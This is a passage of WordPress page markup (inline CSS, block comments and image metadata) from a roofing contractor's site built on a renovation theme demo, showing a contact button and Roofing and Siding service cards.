1; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"9ccb550a-9017-4524-9954-a7be7540627b\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-9ccb550a-9017-4524-9954-a7be7540627b background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-9ccb550a-9017-4524-9954-a7be7540627b.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-9ccb550a-9017-4524-9954-a7be7540627b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-9ccb550a-9017-4524-9954-a7be7540627b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-9ccb550a-9017-4524-9954-a7be7540627b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-9ccb550a-9017-4524-9954-a7be7540627b.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-9ccb550a-9017-4524-9954-a7be7540627b .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9ccb550a-9017-4524-9954-a7be7540627b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9ccb550a-9017-4524-9954-a7be7540627b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9ccb550a-9017-4524-9954-a7be7540627b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"dba5a57c-6107-4f82-a964-673588d98dce\"} -->\n<style type=\"text/css\"> .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-dba5a57c-6107-4f82-a964-673588d98dce skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"0b9e5611-3349-4218-a906-00718b0363e1\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0b9e5611-3349-4218-a906-00718b0363e1\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"a975dbd0-6829-41b9-b61d-4e9684d440f4\"} -->\n<style type=\"text/css\"> .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Never worry again with a  new roof from Dunrite. Call for free estimate.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"c7d7caa5-ceee-43f3-a4c0-2e76984590ee\"} -->\n<style type=\"text/css\"> .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Siding</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Either vinyl shakes or custom metal trim contact Dunrite for a free estimate..</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"07e40f2e-6c43-4426-9c51-32b198680ee5\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-07e40f2e-6c43-4426-9c51-32b198680ee5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,